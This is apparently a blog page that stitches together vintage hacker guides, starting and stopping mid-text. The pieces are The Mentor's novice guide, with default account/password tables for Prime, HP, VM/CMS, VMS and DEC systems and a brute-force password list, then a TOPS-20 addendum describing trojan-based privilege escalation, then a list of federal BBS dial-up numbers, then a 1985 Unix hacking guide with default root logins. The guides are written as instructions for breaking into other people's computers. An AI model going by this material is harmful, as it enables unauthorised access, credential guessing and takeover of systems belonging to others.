comes with a good set of help files. One of the most useful
features of a Prime on Telenet is a facility called NETLINK. Once
you're inside, type NETLINK and follow the help files. This allows
you to connect to NUA's all over the world using the 'nc' command.
For example, to connect to NUA 026245890040004, you would type
@nc :26245890040004 at the netlink prompt.
Common Accounts/Defaults:
PRIME PRIME or PRIMOS
PRIMOS_CS PRIME or PRIMOS
PRIMENET PRIMENET
SYSTEM SYSTEM or PRIME
NETLINK NETLINK
TEST TEST
GUEST GUEST
GUEST1 GUEST

HP-x000- This system is made by Hewlett-Packard. It is characterized by the
':' prompt. The HP has one of the more complicated login sequences
around- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.
Fortunately, some of these fields can be left blank in many cases.
Since any and all of these fields can be passworded, this is not
the easiest system to get into, except for the fact that there are
usually some unpassworded accounts around. In general, if the
defaults don't work, you'll have to brute force it using the
common password list (see below.) The HP-x000 runs the MPE operat-
ing system, the prompt for it will be a ':', just like the logon
prompt.
Common Accounts/Defaults:
MGR.TELESUP,PUB User: MGR Acct: HPONLY Grp: PUB
MGR.HPOFFICE,PUB unpassworded
MANAGER.ITF3000,PUB unpassworded
FIELD.SUPPORT,PUB user: FLD, others unpassworded
MAIL.TELESUP,PUB user: MAIL, others
unpassworded
MGR.RJE unpassworded
FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96 unpassworded
MGR.TELESUP,PUB,HPONLY,HP3 unpassworded

IRIS- IRIS stands for Interactive Real Time Information System. It orig-
inally ran on PDP-11's, but now runs on many other minis. You can
spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,
and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking
in, and keeps no logs of bad attempts. I don't know any default
passwords, so just try the common ones from the password database
below.
Common Accounts:
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING

VM/CMS- The VM/CMS operating system runs in International Business Machines
(IBM) mainframes. When you connect to one of these, you will get
message similar to 'VM/370 ONLINE', and then give you a '.' prompt,
just like TOPS-10 does. To login, you type 'LOGON '.
Common Accounts/Defaults are:
AUTOLOG1: AUTOLOG or AUTOLOG1
CMS: CMS
CMSBATCH: CMS or CMSBATCH
EREP: EREP
MAINT: MAINT or MAINTAIN
OPERATNS: OPERATNS or OPERATOR
OPERATOR: OPERATOR
RSCS: RSCS
SMART: SMART
SNA: SNA
VMTEST: VMTEST
VMUTIL: VMUTIL
VTAM: VTAM

NOS- NOS stands for Networking Operating System, and runs on the Cyber
computer made by Control Data Corporation. NOS identifies itself
quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE
SYSTEM. COPYRIGHT CONTROL DATA 1978,1987'. The first prompt you
will get will be FAMILY:. Just hit return here. Then you'll get
a USER NAME: prompt. Usernames are typically 7 alpha-numerics
characters long, and are *extremely* site dependent. Operator
accounts begin with a digit, such as 7ETPDOC.
Common Accounts/Defaults:
$SYSTEM unknown
SYSTEMV unknown

Decserver- This is not truly a computer system, but is a network server that
has many different machines available from it. A Decserver will
say 'Enter Username>' when you first connect. This can be anything,
it doesn't matter, it's just an identifier. Type 'c', as this is
the least conspicuous thing to enter. It will then present you
with a 'Local>' prompt. From here, you type 'c ' to
connect to a system. To get a list of system names, type
'sh services' or 'sh nodes'. If you have any problems, online
help is available with the 'help' command. Be sure and look for
services named 'MODEM' or 'DIAL' or something similar, these are
often outdial modems and can be useful!

GS/1- Another type of network server. Unlike a Decserver, you can't
predict what prompt a GS/1 gateway is going to give you. The
default prompt it 'GS/1>', but this is redifinable by the
system administrator. To test for a GS/1, do a 'sh d'. If that
prints out a large list of defaults (terminal speed, prompt,
parity, etc...), you are on a GS/1. You connect in the same manner
as a Decserver, typing 'c '. To find out what systems
are available, do a 'sh n' or a 'sh c'. Another trick is to do a
'sh m', which will sometimes show you a list of macros for logging
onto a system. If there is a macro named VAX, for instance, type
'do VAX'.

The above are the main system types in use today. There are
hundreds of minor variants on the above, but this should be
enough to get you started.

Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
Occasionally you will connect to a system that will do nothing but sit
there. This is a frustrating feeling, but a methodical approach to the system
will yield a response if you take your time. The following list will usually
make *something* happen.
1) Change your parity, data length, and stop bits. A system that won't re-
spond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don't have a term
program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
While having a good term program isn't absolutely necessary, it sure is
helpful.
2) Change baud rates. Again, if your term program will let you choose odd
baud rates such as 600 or 1100, you will occasionally be able to penetrate
some very interesting systems, as most systems that depend on a strange
baud rate seem to think that this is all the security they need...
3) Send a series of 's.
4) Send a hard break followed by a .
5) Type a series of .'s (periods). The Canadian network Datapac responds
to this.
6) If you're getting garbage, hit an 'i'. Tymnet responds to this, as does
a MultiLink II.
7) Begin sending control characters, starting with ^A --> ^Z.
8) Change terminal emulations. What your vt100 emulation thinks is garbage
may all of a sudden become crystal clear using ADM-5 emulation. This also
relates to how good your term program is.
9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
JOIN, HELP, and anything else you can think of.
10) If it's a dialin, call the numbers around it and see if a company
answers. If they do, try some social engineering.

Brute Force Hacking
~~~~~~~~~~~~~~~~~~~
There will also be many occasions when the default passwords will not work
on an account. At this point, you can either go onto the next system on your
list, or you can try to 'brute-force' your way in by trying a large database
of passwords on that one account. Be careful, though! This works fine on
systems that don't keep track of invalid logins, but on a system like a VMS,
someone is going to have a heart attack if they come back and see '600 Bad
Login Attempts Since Last Session' on their account. There are also some
operating systems that disconnect after 'x' number of invalid login attempts
and refuse to allow any more attempts for one hour, or ten minutes, or some-
times until the next day.
The following list is taken from my own password database plus the data-
base of passwords that was used in the Internet UNIX Worm that was running
around in November of 1988. For a shorter group, try first names, computer
terms, and obvious things like 'secret', 'password', 'open', and the name
of the account. Also try the name of the company that owns the computer
system (if known), the company initials, and things relating to the products
the company makes or deals with.

Password List
=============

aaa daniel jester rascal
academia danny johnny really
ada dave joseph rebecca
adrian deb joshua remote
aerobics debbie judith rick
airplane deborah juggle reagan
albany december julia robot
albatross desperate kathleen robotics
albert develop kermit rolex
alex diet kernel ronald
alexander digital knight rosebud
algebra discovery lambda rosemary
alias disney larry roses
alpha dog lazarus ruben
alphabet drought lee rules
ama duncan leroy ruth
amy easy lewis sal
analog eatme light saxon
anchor edges lisa scheme
andy edwin louis scott
andrea egghead lynne scotty
animal eileen mac secret
answer einstein macintosh sensor
anything elephant mack serenity
arrow elizabeth maggot sex
arthur ellen magic shark
asshole emerald malcolm sharon
athena engine mark shit
atmosphere engineer markus shiva
bacchus enterprise marty shuttle
badass enzyme marvin simon
bailey euclid master simple
banana evelyn maurice singer
bandit extension merlin single
banks fairway mets smile
bass felicia michael smiles
batman fender michelle smooch
beauty fermat mike smother
beaver finite minimum snatch
beethoven flower minsky snoopy
beloved foolproof mogul soap
benz football moose socrates
beowulf format mozart spit
berkeley forsythe nancy spring
berlin fourier napoleon subway
beta fred network success
beverly friend newton summer
bob frighten next super
brenda fun olivia support
brian gabriel oracle surfer
bridget garfield orca suzanne
broadway gauss orwell tangerine
bumbling george osiris tape
cardinal gertrude outlaw target
carmen gibson oxford taylor
carolina ginger pacific telephone
caroline gnu painless temptation
castle golf pam tiger
cat golfer paper toggle
celtics gorgeous password tomato
change graham pat toyota
charles gryphon patricia trivial
charming guest penguin unhappy
charon guitar pete unicorn
chester hacker peter unknown
cigar harmony philip urchin
classic harold phoenix utility
coffee harvey pierre vicky
coke heinlein pizza virginia
collins hello plover warren
comrade help polynomial water
computer herbert praise weenie
condo honey prelude whatnot
condom horse prince whitney
cookie imperial protect will
cooper include pumpkin william
create ingres puppet willie
creation innocuous rabbit winston
creator irishman rachmaninoff wizard
cretin isis rainbow wombat
daemon japan raindrop yosemite
dancer jessica random zap

Part Four: Wrapping it up!
~~~~~~~~~~~~~~~~~~~~~~~~~~
I hope this file has been of some help in getting started. If you're
asking yourself the question 'Why hack?', then you've probably wasted a lot
of time reading this, as you'll never understand. For those of you who
have read this and found it useful, please send a tax-deductible donation
of $5.00 (or more!) in the name of the Legion of Doom to:
The American Cancer Society
90 Park Avenue
New York, NY 10016

******************************************************************************
References:
1) Introduction to ItaPAC by Blade Runner
Telecom Security Bulletin #1
2) The IBM VM/CMS Operating System by Lex Luthor
The LOD/H Technical Journal #2
3) Hacking the IRIS Operating System by The Leftist
The LOD/H Technical Journal #3
4) Hacking CDC's Cyber by Phrozen Ghost
Phrack Inc. Newsletter #18
5) USENET comp.risks digest (various authors, various issues)
6) USENET unix.wizards forum (various authors)
7) USENET info-vax forum (various authors)

Recommended Reading:
1) Hackers by Steven Levy
2) Out of the Inner Circle by Bill Landreth
3) Turing's Man by J. David Bolter
4) Soul of a New Machine by Tracy Kidder
5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all
by William Gibson
6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley,
California, 94704, 415-995-2606
7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can find.

Acknowledgements:
Thanks to my wife for putting up with me.
Thanks to Lone Wolf for the RSTS & TOPS assistance.
Thanks to Android Pope for proofreading, suggestions, and beer.
Thanks to The Urvile/Necron 99 for proofreading & Cyber info.
Thanks to Eric Bloodaxe for wading through all the trash.
Thanks to the users of Phoenix Project for their contributions.
Thanks to Altos Computer Systems, Munich, for the chat system.
Thanks to the various security personel who were willing to talk to
me about how they operate.

अ नोविस गाइड तो HACKING

2009-11-03T02:18:00.001-08:00

This file is an addendum to "A Novice's Guide To Hacking" written by "The
Mentor". The word "hacking" is here used the way the non-hacking public
thinks it is used, to mean breaking into somebody else's computer. Its
purpose is to expand and clarify the information about the TOPS-20 operating
system, which runs on DECsystem-20 mainframes. The Mentor basically lumped
this system in with TOPS-10 and didn't note important differences between the
two. I will here reproduce in full what The Mentor had to say about TOPS-10
and about VMS, which are the parent and the offspring of TOPS-20.

VMS- The VAX computer is made by Digital Equipment Corporation (DEC),
and runs the VMS (Virtual Memory System) operating system.
VMS is characterized by the 'Username:' prompt. It will not tell
you if you've entered a valid username or not, and will disconnect
you after three bad login attempts. It also keeps track of all
failed login attempts and informs the owner of the account next time
s/he logs in how many bad login attempts were made on the account.
It is one of the most secure operating systems around from the
outside, but once you're in there are many things that you can do
to circumvent system security. The VAX also has the best set of
help files in the world. Just type HELP and read to your heart's
content.
Common Accounts/Defaults: [username: password [[,password]] ]
SYSTEM: OPERATOR or MANAGER or SYSTEM or SYSLIB
OPERATOR: OPERATOR
SYSTEST: UETP
SYSMAINT: SYSMAINT or SERVICE or DIGITAL
FIELD: FIELD or SERVICE
GUEST: GUEST or unpassworded
DEMO: DEMO or unpassworded
DECNET: DECNET

DEC-10- An earlier line of DEC computer equipment, running the TOPS-10
operating system. These machines are recognized by their
'.' prompt. The DEC-10/20 series are remarkably hacker-friendly,
allowing you to enter several important commands without ever
logging into the system. Accounts are in the format [xxx,yyy] where
xxx and yyy are integers. You can get a listing of the accounts and
the process names of everyone on the system before logging in with
the command .systat (for SYstem STATus). If you seen an account
that reads [234,1001] BOB JONES, it might be wise to try BOB or
JONES or both for a password on this account. To login, you type
.login xxx,yyy and then type the password when prompted for it.
The system will allow you unlimited tries at an account, and does
not keep records of bad login attempts. It will also inform you
if the UIC you're trying (UIC = User Identification Code, 1,2 for
example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

**** note: I'm remembering this stuff from several years ago, and in some
cases my memory may be foggy or stuff may be outdated.

TOPS-20, once you are inside, resembles VMS much more than it resembles
TOPS-10, as far as I know (I'm not really familiar with VMS). From the
outside, it's more like TOPS-10, except that the prompt is a @ instead of a
period. You can enter many commands without logging in, including SYSTAT and
probably FINGER. (Sometimes you can even use the mail program without
logging in.) It is very helpful. Not only does the command HELP lead to
lots of useful information, but anywhere in typing a command you can press ?
and it will tell you what the format of the command expects. For instance,
if you type ? by itself, it will tell you all the words that a command can
begin with. If you type S?, it will tell you all the commands that start
with the letter S. If you type SYSTAT ?, it will tell you the options
available on the systat command. You can use this at any point in any
command. Furthermore, if there is only one possibility (you have typed a
unique abbreviation), you can press Escape and it will finish the word for
you. I'm not sure, but I think TOPS-20 was the system that first introduced
filename completion as well --turning a uniquely abbreviated filename into a
complete name when you press escape, beeping if the abbreviation is not
unique. With command keywords you can leave the abbreviation un-expanded,
with filenames you have to expand it (or type it all in) for it to work.

Use the "Login" command to log in, followed by a username. It will prompt
for a password. Note that a password can be something like 39 characters
long, as can the username itself. TOPS-20 does NOT use numbers like 317,043
for user IDs. (Note that these numbers in TOPS-10 are octal, not decimal.)
Furthermore, the password can contain spaces. So, if somebody wants to make
his password difficult to guess, he can easily do so.

(But sometimes they might get overconfident. I remember a story from
Stanford... Someone asked the large cheese if he would let him know what the
operator password was, and he said "The operator password is currently
unavailable." So the guy tried "currently unavailable" as a password, and
got in. (Which reminds me of the time they got a real bug in the system
there... a head crash caused by an ant on the disk platter.))

In general, TOPS-20 does not limit the number of login attempts, nor does it
keep a record of bad tries. However, it is not difficult for the local
management to add such measures, or others such as a delay of several seconds
after each attempt. And unlike Unix, it is difficult to evade these even
once you're in. Without heavy in-depth knowledge, you can't test a username-
password combination except through a system call, which will enforce delays
and limited failures and such against password-trying programs.

So, TOPS-20 is easy to defend against the "database hack", in which you try
many different common passwords with many different usernames. (Unix is
much more vulnerable to this.) But any particular system, especially a lax
one like a college machine (DEC is always popular in academia), might have
little defense here. But you might not know how much defense until too late.

Do try the GUEST username.

But TOPS-20 can be very vulnerable to trojan horses. See, there's this thing
called the Wheel bit. A username that has the Wheel property can do anything
the system operator can do, such as ignore file protection masks, edit the
disks at the track/sector level, change any area of memory... On Unix, only
one user, the superuser, can read and write protected files. On TOPS-20, any
user can do these things from any terminal, if the Wheel attribute is set in
his user data. Some campus computers tend to accumulate excess trusted users
with wheel bits, and have to periodically prune away the unnecessary ones.

The thing is that a wheel can do these things without knowing that he has
done them. Normally the privileged commands are deactivated. But a program
run by a wheel can activate the privileges, do anything it wants, cover its
tracks, and deactivate them without the user ever being the wiser. So if you
can get any wheel user to run any program you wrote, such as a game or small
utility... there's no limit to what you can do. In particular, you can
create a new username, and make it a wheel. Or you can simply ask the system
outright for someone's password, if I'm not mistaken. (All this requires
access to TOPS-20 programming manuals, but some of the necessary material
should be available on line.) You cannot actually conceal this creation, as
far as I know... but maybe with sophisticated enough knowledge you could
make it not immediately apparent... Anyway, once you get that far in, you can
probably keep one step ahead of them for a while... If they erase your new
accounts, you can use the passwords to old ones... They can change all of
the wheel passwords, but a lot of the regular users won't change for some
time... You could even lock the operators out of their own system by
changing all their passwords for them, if you were crazy enough, perhaps
forcing them to shut the machine down to regain control of it. They might
even have to restore stuff from tape backup.

Even if you don't wedge your way into secret stuff, a TOPS-20 system can be
fun to explore. It's much more novice-friendly than most systems, and much
more hacker-friendly as well. I think the ascendency of Unix as the least-
common-denominator OS that everybody can agree on is a definite loss,
compared to TOPS-20.

लिस्ट ऑफ़ गवर्नमेंट बब्स NUMBERS

2009-11-03T02:14:00.000-08:00

FEDERAL GOVERNMENT BULLETIN BOARD SYSTEMS (Last Updated: 8/23/94)

OPM BBSs:
~~~~~~~~
MAINSTREET............. (202) 606-4800
Fed Pers & Job Info from
OPM's Agencywide BBS
Federal Jobline......... (818) 575-6521
Fed Pers & Job Info from
OPM's Western Region BBS
Fed Job Opp Board (FJOB) (912) 757-3100
Fed Pers & Job Info from
OPM's Macon, GA Service Ctr
FEDJOBS................. (215) 580-2216
Fed Pers & Job Info from
OPM's Philadelphia Region BBS
PayPerNet#1 ............ (202) 606-2675
Fed. Pay & Per. Mgmt Info
from OPM (Line #1)
PayPerNet#2 ............ (202) 606-1876
Fed. Pay & Per. Mgmt Info
from OPM (Line #2)
WASNET ................. (202) 606-1113
OPM Wash Area Serv Ctr BBS;
phone first: 202-606-1848

OTHER FEDERAL BBSs:
~~~~~~~~~~~~~~~~~~
AGRICULTURE DEPT
Agriculture Library 301-504-6510/301-504-5496
Biological Impact Assessment 703-231-3858/800-624-2723
Commercial Information Delivery Service (Must subscribe first:
202-720-5505)
Economic Research Service 800-821-6229
Human Nutrition Information Service 301-436-5078
IndiaNET (USDA & EPA) 605-393-0468

AIR FORCE DEPT
Air Force Small Business BBS 800-821-6229 (type SIGNUP)
Small Computer Support Center 406-731-2503
ULANA BBS (AF Engrg Installation) 405-736-0928
ULANA II (AF Engrg Installation) 405-741-0824
Competition Advocate (AF Space Command) (Call voice first:
719-554-5325)
Standard Systems Center 205-416-5651
Hill AFB 801-774-6509

Argonne National Laboratory 708-252-8241

ARMY DEPT
Integration & Analysis Center (IMA) 703-285-6400/6401
Automated Specification Criteria (Corps 916-557-7997/800-445-8644
of Engrs)
Data Distribution System (Engrg & 703-355-2185
Housing Supp Ctr)
Morale, Welfare, and Recreation (MDW) 202-475-7543
Software Engrg Support BBS (Army Sfw Ctr) 703-285-9637

Bureau of Mines (Minerals production) 202-501-0373

Bureau of Prisons 202-514-6102

CENSUS BUREAU
Census BEA Electronic Forum 301-763-7554
Census Personnel BBS 301-763-4574

COAST GUARD
Coast Guard Online Magazine & News 202-267-4644
Global Positioning System BBS 703-866-3894/703-313-5910

COMMERCE DEPT
Radio Frequency Mgmt Issues (NTIA) 202-482-1199
Economic BBS 202-482-3870
Planning & Budget BBS 202-482-1423

Customs Service 703-440-6155

DC Government 202-727-6668

DEFENSE DEPT
ADA Information Clearinghouse 703-614-0215
Export License I 703-697-6109
DISA Acquisition Clearinghouse 618-256-9200
DISA Info Technology Acquisition 618-744-8787
DOD IGNet 703-604-5768

Defense Logistics Agency DASC-ZE BBS 703-274-5863

Defense Mapping Agency NAVINFONET BBS 301-227-4424
(Marine advisories)

Defense Technology Security Admin ELISA I 703-697-6109
(Export license status)

EDUCATION DEPT
Educational Research & Improvement 202-219-2011
National Education BBS 800-222-4922/202-219-1511

ENERGY DEPT
Megawatts 202-586-0739
Civilian Radioactive Waste Mgmt Infolink (Call voice first:
800-225-6972)
Energy Information Admin BA BBS 202-586-2557
Office of Fossil Energy FE Telenews 202-586-6496
Office of Minority Economic Impact 800-543-2325/202-586-1561

ENVIRONMENTAL PROTECTION AGENCY (EPA)
EPA Region 4 404-347-1767
EPA Region 10 206-553-2241
Alternative Treatment Tech Info 301-670-3813/3808
Center (ATTIC)
Wetlands, Oceans, & Watersheds 301-589-0205
Pesticide Information Network 703-305-5919
Pollution Prevention BBS 800-658-8815/703-506-1025
Research & Development BBS 513-569-7610/800-258-9605
Technology Transfer Network 919-541-1447/919-541-5742
Cleanup Information 301-589-8366
Solid Waste Management 800-544-1936
EPA/NOAA Gulfline 800-235-4662/601-688-2677
Ocean & Coastal Protection 202-260-8482
Division CoastNet
Online Library System (OLS) 919-549-0700 (2400)
(NOTE: 7-E-1 HALF Duplex) 919-549-0720 (9600)
Office of Air Quality Planning 919-541-1325
Center for Exposure Assessment Modeling 706-546-3402

Export-Import Bank - EXIMBANK BBS 202-566-4699

FEDERAL AVIATION ADMINISTRATION
Air Traffic Operations Service 202-267-5331
Air Transport Division 202-267-5231
FAA Airports 202-267-5205
FAA Headquarters BBS 202-267-5697
Navigation & Landing 202-267-6547
Office of Environment & Energy 202-267-9647
FAA Safety Exchange 800-426-3814
Orlando Flight Service District 407-648-6309
Office Pilot Examiner 405-684-4530/405-954-4530
Portland Master Minimum Equipment 207-780-3297
List

FEDERAL COMMUNICATIONS COMMISSION
FCC State Link 202-632-1361
FCC Public Access Link 301-725-1072

FEDERAL EMERGENCY MANAGEMENT AGENCY
Hazardous Materials 708-972-3275
State/Local Emergency Management 202-646-2887

Federal Energy Regulatory Commission:
Issuance Posting System 202-208-1397

Federal Highway Administration FEEBS 202-366-3764

Federal Information Exchange FEDIX 800-232-4879

FEDERAL RESERVE BANK
Dallas: Federal Reserve Economic Data 214-922-5199
Minneapolis: Electronic Database 612-340-2489
St. Louis: Federal Reserve Economic Data 314-621-1824

FEDERAL SUPPLY SERVICE
Automated Product Listing Service 703-305-6570
Multiuse File For Interagency News 202-205-3890

Food & Drug Administration 301-443-7496

Government Accounting Office GAO WATCHDOG 202-371-2455

GEOLOGICAL SURVEY
Quick Epicenter Determination 800-358-2663
Geological Survey BBS/CD-ROM Info 703-648-4168

Government Printing Office
FEDERAL BULLETIN BOARD 202-512-1387

GPS Global Positioning 703-866-3890

GENERAL SERVICES ADMINISTRATION
Cooperative Administrative Support 202-653-7516
Program
Consumer Information Center 202-208-7679
GSA Schedule 202-501-7254
Office of IRM OFIRM BBS 202-208-7484

HEALTH & HUMAN SERVICES DEPT
Administration for Children & Families 202-401-5800
National Institute on Alcohol Abuse 202-289-4112
Office of the Asst Secretary of Health 202-690-5423
Social Security Administration 410-965-1133
(Annual Wage Reporting BBS)
Social Security Administration 410-966-5051

Housing & Urban Development Dept 202-708-3563

INTERIOR DEPT
Fish & Wildlife Service 303-226-9365
Geological Survey 703-648-4168
Indian Health Service 401-443-9517
Office of Environmental Affairs 202-208-7119
Offshore Statistics & Information 703-787-1225

INTERNAL REVENUE SERVICE
ISM Support Information System 202-219-9977
Statistics of Income 202-874-9574
Martinsburg Info Reporting Project 304-263-2749

JUSTICE DEPT
Criminal Justice Reference Service 301-738-8895
SEARCH-BBS 916-392-4640

LABOR DEPT
Labor News 202-219-4784
Office of Public Affairs 202-523-4784

LIBRARY OF CONGRESS
News Service 202-707-3854
Automated Library Information 202-707-4888

Maritime Admin/Market Promotion 202-366-8505

NAPO/AIDS Info & Reports 202-690-5423

NATIONAL AERONAUTICS & SPACE ADMIN
Marshall Space Flight Ctr NASA SPACELINK 205-895-0028
NASA JSC Houston 713-483-5817
NASA JPL 818-354-1333

National Archives FREND (Fed. Register 202-275-0920
Electronic News Delivery)

NATIONAL INSTITUTE OF STANDARDS & TECHNOLOGY
Center for Fire Research 301-990-2272
Computer Security 301-948-5140/5717
Data Management Information 301-948-2059/2048
North American ISDN Users Forum 301-869-7281

National Institutes of Health
PC BULL 301-480-8400
NIH Information Center 301-480-5144

NATIONAL OCEANIC & ATMOSPHERIC ADMIN
Space Environment Lab 303-497-5000
Marine Data Computer 301-713-4573
Environmental Services Data Directory 205-606-4666
NOAA Library 303-497-5848
National Geo Data Center 303-497-7319

NATIONAL SCIENCE FOUNDATION
Fed. R&D, Tech Labor Market Stats 202-634-1764
Science & Technology Information 202-357-0359
System

National Tech. Info. Service (NTIS)
FEDWorld 703-321-8970/8020

National Tele. & Info Admin 202-482-1199

National Weather Service 301-899-0827

NAVY DEPT
IRM College Recruitment BBS 804-445-2104/804-843-4093
Online Automated System 804-445-1627
ADA Technical Support BBS 804-444-7841
Naval Reserve Force BBS 504-254-7776
JAGNet 703-325-0748
CINCLANTFLT BBS 804-445-1146
COMNAVSURFPAC/COMNAVAIRPAC 619-556-0135/0136
COMSUBLANT 804-445-8657
Defense Energy Information System (DEIS) 805-982-5300/805-984-0686
NAS Pax River (MilECHO MetroLink) 301-826-4805
Fleet Imaging BBS 804-433-2534
General Purpose Electronic Test Equipment 301-862-8048
(GPETE)
Naval Aviation Maintenance Office, 301-826-3626
Pax River
Naval Air Warfare Center, Indianapolis 317-351-4992
Naval Energy BBS 805-985-5062
Naval Justice School 401-841-3990
Pacific Missile Test Center 805-989-8722
SIMA, Portsmouth, VA 804-396-0158

Office of Government Ethics 202-523-1186

OFFICE OF PERSONNEL MANAGEMENT
OPM Mainstreet............. 202 606-4800
Fed Personnel Issues,
Policy, & Job Info from
OPM's Agencywide/Nationwide BBS
Federal Jobline......... 818 575-6521
Fed Pers & Job Info from
OPM's Western Region BBS
Fed Job Opp Board (FJOB) 912 757-3100
Fed Pers & Job Info from
OPM's Macon, GA Service Ctr
FEDJOBS................. 215 580-2216
Fed Pers & Job Info from
OPM's Philadelphia Region BBS
PayPerNet ............ 202 606-2675/1876
Fed. Pay & Per. Mgmt Info
from OPM
WASNET ................. 202 606-1113
OPM Wash Area Serv Ctr BBS;
phone first: 202-606-1848

SMALL BUSINESS ADMINISTRATION
SBA DC Metro 202-401-9600
SBA National 800-697-INFO
SBA Internal 202-205-6269

STATE DEPT
Automated License Status System 703-875-7350
Consular Affairs 202-647-9225
Passport Info/Travel Alerts 202-647-9225
PerManNet 703-715-9806

TREASURY DEPT/Financial Management Service
Inventory Rates 202-287-0767
Federal Bond Approvals 202-287-1295/202-874-7214

U.S. CONGRESS
Federal Whistleblower BBS 202-225-5527

U.S. COURTS
1st Circuit Court of Appeals 617-223-4640
4th Circuit Court of Appeals 804-771-8084
5th Circuit Court of Appeals 504-589-6850
6th Circuit Court of Appeals 513-684-2842
7th Circuit Court of Appeals 312-435-5560
8th Circuit Court of Appeals 314-539-3576
9th Circuit Court of Appeals 415-744-9022
U.S. District Court E Pennsylvania 215-597-0646

DEPARTMENT OF VETERANS AFFAIRS
American Veterans Network 410-761-3406
United States Veterans BBS 612-588-7563

Beginners Guide to Hacking Unix

2009-11-03T01:23:00.000-08:00

************************************** * A BEGINNERS GUIDE TO: * * H A C K I N G * * * * U N I X * * * * BY JESTER SLUGGO * * (NOTE: THIS IS WRITTEN IN 40 COL.) * * WRITTEN 10/08/85 * ************************************** IN THE FOLLOWING FILE, ALL REFERENCES MADE TO THE NAME UNIX, MAY ALSO BE SUBSTITUTED TO THE XENIX OPERATING SYSTEM. BRIEF HISTORY: BACK IN THE EARLY SIXTIES, DURING THE DEVELOPMENT OF THIRD GENERATION COMPUTERS AT MIT, A GROUP OF PROGRAMMERS STUDYING THE POTENTIAL OF COMPUTERS, DISCOVERED THEIR ABILITY OF PERFORMING TWO OR MORE TASKS SIMULTANEOUSLY. BELL LABS, TAKING NOTICE OF THIS DISCOVERY, PROVIDED FUNDS FOR THEIR DEVELOPMENTAL SCIENTISTS TO INVESTIGATE INTO THIS NEW FRONTIER. AFTER ABOUT 2 YEARS OF DEVELOPMENTAL RESEARCH, THEY PRODUCED AN OPERATING SYSTEM THEY CANLMD "UNIX". SIXTIES TO CURRENT: DURING THIS TIME BELL SYSTEMS INSTALLED THE UNIX SYSTEM TO PROVIDE THEIR COMPUTER OPERATORS WITH THE ABILITY TO MULTITASK SO THAT THEY COULD BECOME MORE PRODUCTIVE, AND EFFICIENT. ONE OF THE SYSTEMS THEY PUT ON THE UNIX SYSTEM WAS CALLED "ELMOS". THROUGH ELMOS MANY TASKS (I.E. BILLING,AND INSTALLATION RECORDS) COULD BE DONE BY MANY PEOPLE USING THE SAME MAINFRAME. NOTE: COSMOS IS ACCESSED THROUGH THE ELMOS SYSTEM. CURRENT: TODAY, WITH THE DEVELOPMENT OF MICRO COMPUTERS, SUCH MULTITASKING CAN BE ACHIEVED BY A SCALED DOWN VERSION OF UNIX (BUT JUST AS POWERFUL). MICROSOFT,SEEING THIS DEVELOPMENT, OPTED TO DEVELOP THEIR OWN UNIX LIKE SYSTEM FOR THE IBM LINE OF PC/XT'S. THEIR RESULT THEY CALLED XENIX (PRONOUNCED ZEE-NICKS). BOTH UNIX AND XENIX CAN BE EASILY INSTALLED
ON IBM PC'S AND OFFER THE SAME FUNCTION
(JUST 2 DIFFERENT VENDORS).

NOTE: DUE TO THE MANY DIFFERENT
VERSIONS OF UNIX (BERKLEY UNIX,
BELL SYSTEM III, AND SYSTEM V
THE MOST POPULAR) MANY COMMANDS
FOLLOWING MAY/MAY NOT WORK. I HAVE
WRITTEN THEM IN SYSTEM V ROUTINES.
UNIX/XENIX OPERATING SYSTEMS WILL
BE CONSIDERED IDENTICAL SYSTEMS BELOW.

HOW TO TELL IF/IF NOT YOU ARE ON A
UNIX SYSTEM: UNIX SYSTEMS ARE QUITE
COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:

LOGIN; (OR LOGIN;)
PASSWORD:

WHEN HACKING ON A UNIX SYSTEM IT IS
BEST TO USE LOWERCASE BECAUSE THE UNIX
SYSTEM COMMANDS ARE ALL DONE IN LOWER-
CASE.
LOGIN; IS A 1-8 CHARACTER FIELD. IT IS
USUALLY THE NAME (I.E. JOE OR FRED)
OF THE USER, OR INITIALS (I.E. J.JONES
OR F.WILSON). HINTS FOR LOGIN NAMES
CAN BE FOUND TRASHING THE LOCATION OF
THE DIAL-UP (USE YOUR CN/A TO FIND
WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD
ASSIGNED BY THE SYSOP OR CHOSEN BY THE
USER.
COMMON DEFAULT LOGINS
--------------------------
LOGIN; PASSWORD:
ROOT ROOT,SYSTEM,ETC..
SYS SYS,SYSTEM
DAEMON DAEMON
UUCP UUCP
TTY TTY
TEST TEST
UNIX UNIX
BIN BIN
ADM ADM
WHO WHO
LEARN LEARN
UUHOST UUHOST
NUUCP NUUCP

IF YOU GUESS A LGIN NAME AND YOU ARE
NOT ASKED FOR A PASSWORD, AND HAVE
ACCESSED TO THE SYSTEM, THEN YOU HAVE
WHAT IS KNOWN AS A NON-GIFTED ACCOUNT.
IF YOU GUESS A CORRECT LOGIN AND PASS-
WORD, THEN YOU HAVE A USER ACCOUNT.
AND, IF YOU GUESS THE ROOT PASSWORD,
THEN YOU HAVE A "SUPER-USER" ACCOUNT.
ALL UNIX SYSTEMS HAVE THE FOLLOWING
INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:

$
%
#

BUT CAN BE JUST ABOUT ANYTHING THE
SYSOP OR USER WANTS IT TO BE.

THINGS TO DO WHEN YOU ARE IN: SOME
OF THE COMMANDS THAT YOU MAY WANT TO
